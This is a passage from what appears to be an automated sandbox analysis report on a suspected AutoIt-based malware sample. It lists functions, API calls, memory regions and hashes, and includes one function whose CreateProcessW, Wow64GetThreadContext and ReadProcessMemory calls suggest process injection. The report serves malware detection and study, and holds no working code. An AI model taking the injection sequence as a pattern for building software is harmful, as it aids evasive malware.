                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _strcat
                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                • API String ID: 1765576173-2684727018
                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                • Opcode Fuzzy Hash: f800691a6c58702cf5a996edc2c5780f63a8d9386b34bd2a46259168d6db88b9
                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLast__wsplitpath_malloc
                                                • String ID:
                                                • API String ID: 4163294574-0
                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                • Opcode Fuzzy Hash: 3d6c7d7a6ae677920793bf96237225282887b2b30ba90914ff16095f93448b68
                                                • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                • _strcat.LIBCMT ref: 0040F786
                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                • String ID:
                                                • API String ID: 3199840319-0
                                                • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FreeInfoLibraryParametersSystem
                                                • String ID:
                                                • API String ID: 3403648963-0
                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                • __lock_file.LIBCMT ref: 00414A8D
                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • __lock_file.LIBCMT ref: 00415012
                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2999321469-0
                                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                Function 03EDD2AD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03EDDADD
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EDDB01
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EDDB23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                • Instruction ID: 900521c0946631972d536aba368e9e062a64e0c4af545e3b17f83e683eea3f25
                                                • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                • Instruction Fuzzy Hash: 9912CF24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A
                                                Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __lock_file
                                                • String ID:
                                                • API String ID: 3031932315-0
                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
